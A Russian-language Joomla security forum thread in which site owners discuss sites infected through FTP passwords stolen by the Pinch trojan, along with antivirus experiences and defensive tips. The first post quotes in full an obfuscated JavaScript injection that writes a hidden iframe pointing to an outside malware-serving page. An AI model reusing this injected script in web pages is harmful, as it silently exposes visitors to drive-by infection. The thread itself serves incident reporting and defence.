Важно !!! взлом сайтов новым вирусом - Безопасность сайтов на Joomla

сегодня поломали сайт новым вирусом.
дописывает в конец index.php
вот такую строчку в <script> вредоносный код ниже, сам вредоносен и качает файлы pdf зараженные. </script>:

var source ="=jgsbnf!tsd>#iuuq;00svtsn/dpn0dpvoufs0hp/qiq@tje>2#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);

стоит joomla 1.0.12
доп компоненты: AdsManager 2.1.19, linx 1.хз

Уважаемый, ну почитали бы вы форум и сразу бы нашли ответ. Ничего нового в данном случае нет и не было. Как воровали трояны у беспечных пользователей пароли к FTP так и воруют. И до тех пор, пока пользователи не начнут серьезно относиться к вопросам безопасности - данная ситуация будет повторяться с завидной регулярностью.

пароль от фтп хранится у меня в архиве rar под большим паролем
да и сам пароль не маленький.

И из архива в FTP-клиент он попадает сам по себе, минуя буфер обмена? Тогда можно предположить только одно - волшебство.

ну почему же, как будь то больше нет возможности взломать сайт кроме как своровать пароль от фтп
дак и у меня на аккаунте том не один сайт а 4
а взломали только 2 из них, причем код вирусы в сайты дописали разный

ответ от саппорта:
Механизм заражения сайта следующий. Индексные страницы менялись посредством FTP ЛЕГАЛЬНОГО подключения, т.е. никакого взлома сайта не производилось, а всего лишь осуществлялся вход по логину/паролю и последующая модификация файлов сайта. После более детального изучения выяснилось, что подобное поведение присуще Trojan'ской программе семейства Pinch, которая умеет обходить брандмауэры и антивирусные программы и похищает все к чему может дотянуться, в том числе пароли, сохраненные в IE, CuteFTP, Total Commander и еще десятке различных программ.

Само заражение происходит следующим образом:
- Сначала загружается Trojan-Downloader.VBS. Psyme.fc или иной - троянская программа-загрузчик других троянов, в последнее время название несколько раз изменялось.
- Именно она подгружает еще два вируса - Trojan-PSW.Win32.LdPinch.bik (или модификация) и Trojan.Win32.Agent.oh (не обязательно).

Вам необходимо:
1. Полная проверка своего компьютера на вирусы, spyware, трояны и прочее вредоносное ПО антивирусом с последними обновлениями, для верности желательно использовать антивирусное ПО нескольких производителей с максимальным уровнем эвристики. Также необходимо проверить на наличие вирусов все компьютеры, имеющие доступ к Вашему FTP.
2. Смена паролей доступа к всем ftp аккаунтам и контрольной панели.
3. Регулярно проверять индексные файлы на предмет появления записей подобного типа. В случае обнаружения удалять вирусную строку.

вот эта строка просто убивает:
поведение присуще Trojan'ской программе семейства Pinch, которая умеет обходить брандмауэры и антивирусные программы и похищает все к чему может дотянуться
похоже это случилось со мной и может случится с вами, и даже каждодневное обновление касперского не помогает.
антивирусы как решето для них...

Вот поэтому после этих случаев я не храню пароли в фтп... Тьфу тьфу тьфу...

поведение присуще Trojan'ской программе семейства Pinch, которая умеет обходить брандмауэры и антивирусные программы

насколько я помню, Kaspersky умел ловить Trojan-PSW.Win32.PdPinch, Trojan-PSW.Win32.LdPinch и им подобные еще в 2007 году. Да и если мне опять же память не изменяет, то авторы данных троянов тоже были найдены товарищами из ФСБ. Модификаций этих зверюшек было много, но касперский их всегда успешно ловил.

нет это не верно...
кстати сказать я уже где то года полтора назад ловил у себя на компе Pinch который не знала ни один из извествествных антивирей(в том числе и всеми любимый каспер и нод32), послал на анализ и дествительно оказался шпиён.
так что блин всеже антивирусы пока что слабы в плане новых разновидностей троянов и других тварей.

Ну во-первых Nod32 никогда троянов и не ловил, и по мне это вообще не антивирус, можно сказать антивирусный файрвол, но не антивирус, он фактически ничего лечить не умеет. А во-вторых, почему-то у меня за последние 8 лет ни разу подобной проблемы не возникало... Может я волшебник? Или может потому, что я всегда придерживаюсь вполне простых правил безопасности?

вы знаете у меня за последние 10  лет тоже это первый раз когда взломали таки что то, но тем не менее будьте бдительнее товарищи, до сегодняшнего дня я тоже считал себя волшебником)))

p.s. вот примеры моих переписок с лабой Касперского за последнее время:
В присланном Вами файле обнаружено новое вредоносное программное обеспечение (Trojan-Downloader.Win32.Horst.ap).
Его детектирование будет включено в очередное обновление антивирусных баз.
Благодарим за оказанную помощь.
и т.д. уже не один раз...

Безусловно, вируосписатели не стоят на месте, и в отличие от разработчиков антивирусов, они чуть-чуть но впереди - они всегда могут проверить свое творение на стойкость к свежим антивирусам.

Но ведь есть куча простых мер безопасности, которые могут помочь. Например:

1. Не посещать малознакомые сайты
2. Ограничить доступ в административную панель сайта по IP
3. Ограничить доступ к FTP по IP
4. Не держать на сайте постоянно открытым FTP, а открывать только тогда, когда он реально нужен. В большинстве случаев это требуется только на этапе настройки сайта или при обновлении.
5. Не использовать IE при работе с незнакомыми сайтами (львиная доля троянов проходит именно с IE)
6. Регулярно менять пароли и на FTP и на административные пароли - даже если утянут, есть вероятность, что воспользоваться не успеют.
7. Регулярно делать резервные копии сайта, чтобы была возможность оперативно откатиться на оригинальную, не зараженную версию.
8. Регулярно обновлять базы антивирусного ПО, использовать какой-либо firewall для мониторинга подозрительной активности на компьютере.

2. Ограничить доступ в административную панель сайта по IP
3. Ограничить доступ к FTP по IP

А как это сделать? Подскажите пожалуйста.

И если можно объясните мне что такое FTP?

9. Отказаться от использования Windows и перейти на Linux или Mac OS. Этот пункт наиболее эффективен.

9. Отказаться от использования Windows и перейти на Linux или Mac OS. Этот пункт наиболее эффективен.

С этим пунктом отпадает пункт IE, насчет кой какого firewall в пункте 8 не совсем согласен, нужно нормально настраивать айпитаблес и открывать только нужные порты...

Хочу поинтересоваться,на сайте в конце в низу каждой статьи стали появляться в строчку ссылки на незнакомые мне сайты,стал смотреть оказалось что код прячеться где то в css
А узнал что в css я загрузил шаблон с сайт а комп,потом снес шаблон и по новой установил такой же только свежий,а потом по очереди каждый файл каждую папку из старого заражоного шаболна заменял,и именно после замены css папки заражонного шаблона появляются эти ссылки,я проверил все CSS фалы но нечего подозрительно не нашел,не подскажите как такое может быть что в CSS прописан код или еще что
Знаю я разгельдяй и всегда оставляю пароль в FilZilla не думал что такое может произойти с моим сайтом,подскажите пожалуйста если знаете
К стате у меня стои Nod ESET Smart Security
Вот скриншот если будет интересно,на скриншоте обвденные ссылки красным цветом вот они появляются

У меня такое было, когда я поставил плагин палёный. Причем, вероятно, установщик ссылок зашифрован и находится в Ява или другой библиотеке. Кординальное решение - переустановка Joomla. Либо надо поковыряться профи. Выведи, если есть, сайт из бекапа (у провайдера) и установи все для безопасности (как вариант).

Ну во-первых Nod32 никогда троянов и не ловил, и по мне это вообще не антивирус, можно сказать антивирусный файрвол, но не антивирус, он фактически ничего лечить не умеет. А во-вторых, почему-то у меня за последние 8 лет ни разу подобной проблемы не возникало... Может я волшебник? Или может потому, что я всегда придерживаюсь вполне простых правил безопасности?

ИНтересно, даже регулярно посещая всякие взрослые ресурсы (естественно бохатые на подобное добро) аналогично никогда ничего не ловил, стоит каспер (лицензия на Internet Security). Правда обычно еще сижу из под outpost домашнего (потому как дома выделенный IP), там тоже правил всяких написано
Потому храню все везде и ни за что не боюсь, элементарная безопасность и некоторое количество денег на лицензию - нет проблем

Потому храню все везде и ни за что не боюсь

Молод ты еще и недостаточно параноидален Если у вас нет паранойи, это еще не значит, что они за вами не следят (с)

Молод ты еще и недостаточно параноидален

админы делятся на тех, кто уже делает бекапы и кто их еще не делает? Знаем знаем
Но увы, за столько лет у меня не было ни одного факта вируса на компе, тем более троянов взломов и прочего, что при моем уровне серфинга как минимум невозможно в обычных обстоятельствах.
фаер+антивирус+элементарная внимательность в сети опосля 300 грамм и нет никаких проблем

админы делятся на тех, кто уже делает бекапы и кто их еще не делает? Знаем знаем
Но увы, за столько лет у меня не было ни одного факта вируса на компе, тем более троянов взломов и прочего, что при моем уровне серфинга как минимум невозможно в обычных обстоятельствах.
фаер+антивирус+элементарная внимательность в сети опосля 300 грамм и нет никаких проблем

Не каркай... у меня на домашнем винда года за 3 также ни одного вируса не подхватила, но паранойя и доступ к далеко не дешевым клиентским сайтам (ну и плюс еще разное) увели меня на linux.

PS Если начнется атака на конкретного человека, тут на винде ничего не спасет

У меня такое было, когда я поставил плагин палёный. Причем, вероятно, установщик ссылок зашифрован и находится в Ява или другой библиотеке

Мне кажется что плагин тут не причем,и при том что кроме шаблона я не каких плагинов или расширений больше не ставил,чистая Joomla стоит,но как только я удалил и переустановил такой же шаблон то ссылки исчезли,в этом шаблоне есть несколько JS файлов может в них код прописан но такие файлы я проверять немогу,возможно что утащили пароль и установили код,еще раз повтарюсь при замене шаблоны ссылки исчезли
Естесвено я данные фтп и хостинга поменял,я везде поменял где можно,но все равно интересно как поал туда код

PS Если начнется атака на конкретного человека, тут на винде ничего не спасет

тут уж никакая система не спасет, пробьют любым путем, так что никсы не панацея

тут уж никакая система не спасет, пробьют любым путем, так что никсы не панацея

Не панацея естественно, но ЗАМЕТНО усложнят поиск дыр, особенно если учесть как небыстро MS правит свои дырки и их способ установки (ну вот работаю я сейчас под никсами дней 20 без рестарта, ежедневно обновляясь) с рестартом (взять многие серверы - там рестарт тупо недопустим слишком часто)

9. Отказаться от использования Windows и перейти на Linux или Mac OS. Этот пункт наиболее эффективен.

Возможно, но все же люнукс на столько дырявая система, что ломануть ее как 5 пальцев об асфальт. А считают ее безопасной только потому, что вирусописателям она на фиг не нужен, ибо львиная доля пользователей сидят на винде.

поведение присуще Trojan'ской программе семейства Pinch, которая умеет обходить брандмауэры и антивирусные программы

Даже не смотря что создателей дятьки поймали, пинч развивается с каждым днем. В данном случае даже сейчас он идет дальше чем каспер шага на 2.
ЗЫ: Сам его пробывал, ни один догдашний антивир его не обнаружил. АйЕ он пробивает за 1 секунду, тащет все.... даже с мыла когда приходит, его скачивать не надо. Вот так.